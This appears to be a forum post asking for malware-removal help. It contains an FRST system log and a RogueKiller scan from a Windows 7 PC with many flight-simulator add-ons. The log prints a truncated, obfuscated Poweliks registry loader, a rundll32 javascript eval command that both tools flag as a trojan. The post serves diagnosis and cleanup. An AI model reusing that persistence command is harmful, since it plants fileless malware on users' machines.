PMDG 737 8900 NGX (HKLM-x32\...\{20708FD5-E94D-4097-A21E-E28564CDBC06}) (Version: 1.00.3219 - PMDG Simulations, LLC.)

PMDG 747-400/400F for FSX (HKLM-x32\...\{EDCEE320-0FB3-4197-9F86-8C1CCF2278FB}) (Version: 2.10.0040 - Precision Manuals Development Group)

PMDG 777-200LR/F Base Package FSX (HKLM-x32\...\{0F16340B-5B5B-4531-8D87-4952E3BCA6E6}) (Version: 1.10.6155 - PMDG Simulations, LLC.)

PMDG 777-300ER Expansion (HKLM-x32\...\{E65EFDE6-0864-40BA-8DDF-E31F736D9000}) (Version: 1.10.6155 - PMDG Simulations, LLC.)

PMDG744X_GE_LH (HKLM-x32\...\{20372FAA-3AF4-4B3D-9B1D-564CDEA5957C}) (Version: 1.00.0000 - Precision Manuals Development Group)

PMDG744X_PW_UA2 (HKLM-x32\...\{2B5DDFFF-F347-489E-861D-98D02D00472D}) (Version: 1.10.0000 - Precision Manuals Development Group)

PMDG744X_PW_UA3 (HKLM-x32\...\{EAB979F7-84A6-47B6-AB39-CA73A6EEAE69}) (Version: 1.00.0000 - Precision Manuals Development Group)

Punta Cana X-Generation FSX v1.0 (HKLM-x32\...\tsimmdpcxx) (Version:  - )

QualityWings Ultimate 757 Collection FSX (HKLM-x32\...\QualityWings Ultimate 757 Collection FSX_is1) (Version: 1.3.2 - QualityWings)

QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)

RAAS Professional by FS2Crew (LOCKED) (HKLM-x32\...\RAAS Professional by FS2Crew (LOCKED)) (Version:  - )

Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6923 - Realtek Semiconductor Corp.)

Rio Santos Dumont FSX P3D 1.1 (HKLM-x32\...\sbrjfsx) (Version: 1.1 - TropicalSim)

RollerCoaster Tycoon 3: Platinum! (HKLM-x32\...\Steam App 2700) (Version:  - Frontier)

SHIELD Streaming (Version: 3.1.2000 - NVIDIA Corporation) Hidden

SHIELD Wireless Controller Driver (Version: 16.13.65 - NVIDIA Corporation) Hidden

SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 2.0.0.0 - Electronic Arts)

St Thomas TIST2010 2.0 (HKLM-x32\...\tist2010fsx) (Version: 2.0 - TropicalSim)

Steam (HKLM-x32\...\Steam) (Version:  - Valve Corporation)

The Political Machine 2012 (HKLM-x32\...\Steam App 211120) (Version:  - Stardock Entertainment)

Tocumen Intl', Panama City FSX 1.0 (HKLM-x32\...\tsimmptoxx) (Version:  - )

TOPCAT 2.74 Beta 1 - Take-Off and Landing Performance Calculation Tool (HKLM-x32\...\TOPCAT) (Version: 2.74 Beta 1 - FSS GmbH)

Train Simulator 2015 (HKLM-x32\...\Steam App 24010) (Version:  - RailSimulator.com)

Ultimate General: Gettysburg (HKLM-x32\...\Steam App 306660) (Version:  - Game-Labs)

UVACARS (HKLM-x32\...\{8FA014EE-A721-428F-89F7-82F7B82D4386}) (Version: 3.3.15 - United Virtual Airlines)

VC_CRT_x64 (Version: 1.02.0000 - Intel Corporation) Hidden

VIRTUALI Addon ManagerX FSX (HKLM-x32\...\VIRTUALI Addon ManagerX FSX_is1) (Version: 2.9.0.23 - VIRTUALI Sagl)

vroute.info (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\ea913c639d7ea423) (Version: 1.1.1.3 - vroute)

Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)

Windows Driver Package - Garmin (grmnusb) GARMIN Devices  (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)

Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB  (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)

Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)

WinRAR 5.01 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)

ZipGenius 6.3 (HKLM-x32\...\{EC3B598C-1151-4191-B5B4-A9072ADE6259}_is1) (Version: 6.3 - Wininizio.it Software)

 

==================== Custom CLSID (selected items): ==========================

 

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

 

CustomCLSID: HKU\S-1-5-21-4134620719-2527629264-1752102789-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Swintal\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.)

CustomCLSID: HKU\S-1-5-21-4134620719-2527629264-1752102789-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Swintal\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File

CustomCLSID: HKU\S-1-5-21-4134620719-2527629264-1752102789-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

CustomCLSID: HKU\S-1-5-21-4134620719-2527629264-1752102789-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Swintal\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.)

 

==================== Restore Points  =========================

 

09-11-2014 22:24:34 Installed Navtech PBS

11-11-2014 12:28:51 Windows Update

11-11-2014 12:56:25 Installed DirectX

11-11-2014 16:30:13 Removed bluCARS

11-11-2014 16:32:59 Installed bluCARS

11-11-2014 19:52:02 Installed DirectX

11-11-2014 19:56:23 Removed Professional Flight Planner X

12-11-2014 02:12:03 Restore Operation

 

==================== Hosts content: ==========================

 

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

 

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

 

==================== Scheduled Tasks (whitelisted) =============

 

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

 

Task: {1CFCAE88-C488-4548-AEA2-F7CCD8E91383} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-01] (Google Inc.)

Task: {1F1F653A-9A63-4693-A116-3801A0037465} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-11-11] (Adobe Systems Incorporated)

Task: {1FC54D89-1B6C-4516-8C55-88DBB102F513} - System32\Tasks\Apple Diagnostics => C:\Program Files (x86)\Common Files\Apple\Internet Services\EReporter.exe [2014-10-17] (Apple Inc.)

Task: {2FB88A66-255E-4A6A-A935-E740E57BAF93} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000UA => C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe [2014-08-10] (Google Inc.)

Task: {40AC2BF1-F61D-4558-B612-A4BA032B00C7} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2014-08-26] (Microsoft Corporation)

Task: {4BD843C3-CFEA-40A4-9AE5-9C55460199CA} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2014-03-19] (Microsoft Corporation)

Task: {4F161FB8-515E-44F8-B090-EBA22AED117E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000Core => C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe [2014-08-10] (Google Inc.)

Task: {668ACBED-DED4-49A0-BF68-DEA3DED3165A} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2014-03-19] (Microsoft Corporation)

Task: {7496BE44-E7B5-4B6D-99ED-83342B76092D} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2014-03-19] (Microsoft Corporation)

Task: {77877023-269F-4E8B-B766-EBB3BC7D4AD1} - System32\Tasks\HP AR Program Upload - b6f1b5de96b0434191ee7a5939bcdd2fed889e11d632473bb14d345dcf17970a => C:\Program Files\HP\HP ENVY 4500 series\bin\HPRewards.exe [2014-03-06] (TODO: <Company name>)

Task: {7DCE01C5-DA32-4944-9E28-BD300B1CE1CD} - System32\Tasks\Microsoft Office 15 Sync Maintenance for Swintal-PC-Swintal Swintal-PC => C:\Program Files\Microsoft Office 15\Root\Office15\MsoSync.exe [2014-09-16] (Microsoft Corporation)

Task: {81F4DB92-CFD7-4E7B-AE0E-F77A560732A9} - System32\Tasks\ASUS\i-Setup132150 => C:\Windows\Chipset\AsusSetup.exe [2010-09-08] (ASUSTeK Computer Inc.)

Task: {84E00E03-EFA2-40C3-A897-3B5ED119201A} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2014-03-19] (Microsoft Corporation)

Task: {8BFD38ED-AEEE-4BF9-A623-86D53F843A53} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2014-09-25] (Microsoft Corporation)

Task: {AE001CD3-A7A1-42E3-9B33-B152E1D23274} - System32\Tasks\ASUS\i-Setup132035 => C:\Windows\Chipset\AsusSetup.exe [2010-09-08] (ASUSTeK Computer Inc.)

Task: {C9CA414C-B003-452A-9D78-C78A251B18E7} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2014-03-19] (Microsoft)

Task: {DB2AFA52-A0DE-4770-BDEA-1CE2AE2C6C30} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)

Task: {F71B3540-246F-452A-B331-044D7D4C5D0D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2014-08-26] (Microsoft Corporation)

Task: {FA4859D3-569B-462F-90CE-053288C3DEC7} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express Self Updater\ExpressSelfUpdater.exe [2014-07-23] ()

Task: {FFAE2AEB-409D-4600-A1EA-B0633B5EC4FF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-01] (Google Inc.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000Core.job => C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000UA.job => C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe

 

==================== Loaded Modules (whitelisted) =============

 

2014-03-01 12:32 - 2012-10-29 02:48 - 00927232 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.01\atkexComSvc.exe

2014-03-01 16:22 - 2014-07-02 13:55 - 00116568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll

2014-03-03 09:26 - 2014-05-20 08:19 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll

2014-10-25 07:48 - 2014-09-09 09:59 - 08896160 _____ () C:\Program Files\Microsoft Office 15\root\Office15\1033\GrooveIntlResource.dll

2014-09-26 11:31 - 2014-09-26 11:31 - 00393376 _____ () C:\Program Files\Microsoft Office 15\Root\Office15\AppVIsvStream64.dll

2014-02-12 19:58 - 2014-02-12 19:58 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll

2014-10-11 12:05 - 2014-10-11 12:05 - 01044776 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll

2014-03-01 12:32 - 2014-11-11 21:30 - 00031232 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.01\PEbiosinterface32.dll

2014-03-01 12:32 - 2012-05-07 11:04 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.01\ATKEX.dll

2014-10-25 07:48 - 2014-09-09 08:12 - 08896160 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\1033\GrooveIntlResource.dll

2012-09-24 08:24 - 2012-09-24 08:24 - 00020480 _____ () C:\Program Files (x86)\PI Engineering\MacroWorks 3.1\Interfaces.dll

2014-03-02 14:28 - 2013-12-08 20:23 - 00732160 _____ () C:\Program Files (x86)\Navigraph\FMS Data Manager\libGLESv2.dll

2014-03-02 14:28 - 2013-12-08 20:32 - 00854016 _____ () C:\Program Files (x86)\Navigraph\FMS Data Manager\platforms\qwindows.dll

2014-03-02 14:28 - 2013-12-08 20:23 - 00047104 _____ () C:\Program Files (x86)\Navigraph\FMS Data Manager\libEGL.dll

2014-03-02 14:28 - 2013-12-08 20:31 - 00021504 _____ () C:\Program Files (x86)\Navigraph\FMS Data Manager\imageformats\qico.dll

2014-10-28 09:00 - 2014-10-21 23:04 - 01042760 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libglesv2.dll

2014-10-28 09:00 - 2014-10-21 23:04 - 00211272 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libegl.dll

2014-10-28 09:00 - 2014-10-21 23:04 - 08910664 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\pdf.dll

2014-10-28 09:00 - 2014-10-21 23:04 - 01681224 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\ffmpegsumo.dll

2014-01-03 01:59 - 2014-02-10 12:04 - 00430080 _____ () C:\Windows\mod_frst.exe

 

==================== Alternate Data Streams (whitelisted) =========

 

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

 

AlternateDataStreams: C:\ProgramData\TEMP:00934A10

AlternateDataStreams: C:\ProgramData\TEMP:74603393

 

==================== Safe Mode (whitelisted) ===================

 

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

 

 

==================== EXE Association (whitelisted) =============

 

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

 

 

==================== MSCONFIG/TASK MANAGER disabled items =========

 

(Currently there is no automatic fix for this section.)

 

 

========================= Accounts: ==========================

 

Administrator (S-1-5-21-4134620719-2527629264-1752102789-500 - Administrator - Disabled)

Brian (S-1-5-21-4134620719-2527629264-1752102789-1004 - Limited - Enabled) => C:\Users\Brian

Guest (S-1-5-21-4134620719-2527629264-1752102789-501 - Limited - Disabled)

HomeGroupUser$ (S-1-5-21-4134620719-2527629264-1752102789-1003 - Limited - Enabled)

Swintal (S-1-5-21-4134620719-2527629264-1752102789-1000 - Administrator - Enabled) => C:\Users\Swintal

 

==================== Faulty Device Manager Devices =============

 

 

==================== Event log errors: =========================

 

Application errors:

==================

Error: (11/11/2014 09:35:56 PM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)

Description: Chrome has encountered a fatal error.

ver=38.0.2125.111;lang=;guid=1E499807DE364B569E83CEEACDEA246E;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\7d62fd68-5e25-4b57-9e2b-329ba36424f1.dmp

 

Error: (11/11/2014 09:33:02 PM) (Source: System Restore) (EventID: 8210) (User: )

Description: An unspecified error occurred during System Restore: (Installed Navtech PBS). Additional information: 0x80070005.

 

Error: (11/11/2014 09:32:13 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

Error: (11/11/2014 09:31:59 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: svchost.exe_stisvc, version: 6.1.7600.16385, time stamp: 0x4a5bc3c1

Faulting module name: HPWia2_EN4500.dll, version: 30.0.411.0, time stamp: 0x505b7712

Exception code: 0x40000015

Fault offset: 0x00000000000324ad

Faulting process id: 0x44c

Faulting application start time: 0xsvchost.exe_stisvc0

Faulting application path: svchost.exe_stisvc1

Faulting module path: svchost.exe_stisvc2

Report Id: svchost.exe_stisvc3

 

Error: (11/11/2014 09:08:40 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

Error: (11/11/2014 04:38:31 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7

Faulting module name: Flash32_15_0_0_223.ocx, version: 15.0.0.223, time stamp: 0x544ecba4

Exception code: 0xc0000005

Fault offset: 0x005e96c7

Faulting process id: 0x1f28

Faulting application start time: 0xiexplore.exe0

Faulting application path: iexplore.exe1

Faulting module path: iexplore.exe2

Report Id: iexplore.exe3

 

Error: (11/11/2014 04:21:14 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7

Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea8e7

Exception code: 0xc0000005

Fault offset: 0x000379ed

Faulting process id: 0x73c

Faulting application start time: 0xiexplore.exe0

Faulting application path: iexplore.exe1

Faulting module path: iexplore.exe2

Report Id: iexplore.exe3

 

Error: (11/11/2014 04:17:52 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

Error: (11/11/2014 04:17:44 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: svchost.exe_stisvc, version: 6.1.7600.16385, time stamp: 0x4a5bc3c1

Faulting module name: HPWia2_EN4500.dll, version: 30.0.411.0, time stamp: 0x505b7712

Exception code: 0x40000015

Fault offset: 0x00000000000324ad

Faulting process id: 0x538

Faulting application start time: 0xsvchost.exe_stisvc0

Faulting application path: svchost.exe_stisvc1

Faulting module path: svchost.exe_stisvc2

Report Id: svchost.exe_stisvc3

 

Error: (11/11/2014 04:10:10 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

 

System errors:

=============

Error: (11/11/2014 09:33:35 PM) (Source: DCOM) (EventID: 10010) (User: )

Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

 

Error: (11/11/2014 09:32:18 PM) (Source: Service Control Manager) (EventID: 7034) (User: )

Description: The Windows Image Acquisition (WIA) service terminated unexpectedly.  It has done this 1 time(s).

 

Error: (11/11/2014 09:31:16 PM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: The Garmin Core Update Service service failed to start due to the following error: 

%%1053

 

Error: (11/11/2014 09:31:16 PM) (Source: Service Control Manager) (EventID: 7009) (User: )

Description: A timeout was reached (30000 milliseconds) while waiting for the Garmin Core Update Service service to connect.

 

Error: (11/11/2014 09:09:54 PM) (Source: DCOM) (EventID: 10010) (User: )

Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

 

Error: (11/11/2014 09:08:42 PM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: The IPsec Policy Agent service failed to start due to the following error: 

%%1053

 

Error: (11/11/2014 09:08:42 PM) (Source: Service Control Manager) (EventID: 7009) (User: )

Description: A timeout was reached (30000 milliseconds) while waiting for the IPsec Policy Agent service to connect.

 

Error: (11/11/2014 09:07:13 PM) (Source: BugCheck) (EventID: 1001) (User: )

Description: 0x00000024 (0x00000000001904fb, 0xfffff880033385e8, 0xfffff88003337e40, 0xfffff80002eb8c50)C:\Windows\MEMORY.DMP111114-30482-01

 

Error: (11/11/2014 09:07:13 PM) (Source: EventLog) (EventID: 6008) (User: )

Description: The previous system shutdown at 5:30:10 PM on ‎11/‎11/‎2014 was unexpected.

 

Error: (11/11/2014 04:20:44 PM) (Source: DCOM) (EventID: 10010) (User: )

Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

 

 

Microsoft Office Sessions:

=========================

Error: (11/11/2014 09:35:56 PM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)

Description: Chrome has encountered a fatal error.

ver=38.0.2125.111;lang=;guid=1E499807DE364B569E83CEEACDEA246E;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\7d62fd68-5e25-4b57-9e2b-329ba36424f1.dmp

 

Error: (11/11/2014 09:33:02 PM) (Source: System Restore) (EventID: 8210) (User: )

Description: Installed Navtech PBS0x80070005

 

Error: (11/11/2014 09:32:13 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

Error: (11/11/2014 09:31:59 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: svchost.exe_stisvc6.1.7600.163854a5bc3c1HPWia2_EN4500.dll30.0.411.0505b77124000001500000000000324ad44c01cffe20ca755d39C:\Windows\system32\svchost.exeC:\Windows\system32\HPWia2_EN4500.dll139dab8c-6a14-11e4-af9d-ac220b2a544f

 

Error: (11/11/2014 09:08:40 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

Error: (11/11/2014 04:38:31 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: iexplore.exe11.0.9600.173444a5bc6b7Flash32_15_0_0_223.ocx15.0.0.223544ecba4c0000005005e96c71f2801cffdf6c5f923c7C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\Macromed\Flash\Flash32_15_0_0_223.ocx141502f9-69eb-11e4-b41e-ac220b2a544f

 

Error: (11/11/2014 04:21:14 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: iexplore.exe11.0.9600.173444a5bc6b7ntdll.dll6.1.7601.18247521ea8e7c0000005000379ed73c01cffdf55f40e0d4C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ntdll.dllaa530802-69e8-11e4-b41e-ac220b2a544f

 

Error: (11/11/2014 04:17:52 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

Error: (11/11/2014 04:17:44 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: svchost.exe_stisvc6.1.7600.163854a5bc3c1HPWia2_EN4500.dll30.0.411.0505b77124000001500000000000324ad53801cffdf4e146e30dC:\Windows\system32\svchost.exeC:\Windows\system32\HPWia2_EN4500.dll2ca5b8e0-69e8-11e4-b41e-ac220b2a544f

 

Error: (11/11/2014 04:10:10 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

 

==================== Memory info =========================== 

 

Processor: Intel® Core i7-4771 CPU @ 3.50GHz

Percentage of memory in use: 22%

Total physical RAM: 16322.27 MB

Available physical RAM: 12717.07 MB

Total Pagefile: 32642.72 MB

Available Pagefile: 28962.79 MB

Total Virtual: 8192 MB

Available Virtual: 8191.84 MB

 

==================== Drives ================================

 

Drive c: () (Fixed) (Total:931.41 GB) (Free:721.61 GB) NTFS

Drive e: (Second Drive) (Fixed) (Total:931.51 GB) (Free:844.12 GB) NTFS

 

==================== MBR & Partition Table ==================

 

========================================================

Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: ACBBF63B)

Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)

Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)

 

========================================================

Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 76A56381)

Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

 

==================== End Of Log ============================

Link to post
Share on other sites

RogueKiller V10.0.5.0 (x64) [Nov 11 2014] by Adlice Software





 

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version

Started in : Normal mode

User : Swintal [Administrator]

Mode : Scan -- Date : 11/11/2014  21:54:42

 

¤¤¤ Processes : 2 ¤¤¤

[Proc.Injected] ekrn.exe -- [x] -> Killed [DrvNtTerm]

[Proc.Injected] dllhost.exe -- [x] -> Killed [TermProc]

 

¤¤¤ Registry : 15 ¤¤¤

[suspicious.Path] (X64) HKEY_USERS\S-1-5-21-4134620719-2527629264-1752102789-1000\Software\Microsoft\Windows\CurrentVersion\Run | Google+ Auto Backup : "C:\Users\Swintal\AppData\Local\Programs\Google\Google+ Auto Backup\Google+ Auto Backup.exe" /autostart  -> Found

[suspicious.Path] (X86) HKEY_USERS\S-1-5-21-4134620719-2527629264-1752102789-1000\Software\Microsoft\Windows\CurrentVersion\Run | Google+ Auto Backup : "C:\Users\Swintal\AppData\Local\Programs\Google\Google+ Auto Backup\Google+ Auto Backup.exe" /autostart  -> Found

[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters | DhcpNameServer : 209.18.47.61 209.18.47.62 [uNITED STATES (US)][uNITED STATES (US)]  -> Found

[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 209.18.47.61 209.18.47.62 [uNITED STATES (US)][uNITED STATES (US)]  -> Found

[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters | DhcpNameServer : 209.18.47.61 209.18.47.62 [uNITED STATES (US)][uNITED STATES (US)]  -> Found

[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{46F98522-0B7E-4616-8783-34B23EF7FE3A} | DhcpNameServer : 209.18.47.61 209.18.47.62 [uNITED STATES (US)][uNITED STATES (US)]  -> Found

[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{46F98522-0B7E-4616-8783-34B23EF7FE3A} | DhcpNameServer : 209.18.47.61 209.18.47.62 [uNITED STATES (US)][uNITED STATES (US)]  -> Found

[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{46F98522-0B7E-4616-8783-34B23EF7FE3A} | DhcpNameServer : 209.18.47.61 209.18.47.62 [uNITED STATES (US)][uNITED STATES (US)]  -> Found

[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-4134620719-2527629264-1752102789-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found

[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-4134620719-2527629264-1752102789-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found

[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found

[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found

[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found

[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found

[Tr.Poweliks] (X64) HKEY_USERS\S-1-5-21-4134620719-2527629264-1752102789-1000\Software\classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\LocalServer32 -> Found

 

¤¤¤ Tasks : 0 ¤¤¤

 

¤¤¤ Files : 0 ¤¤¤

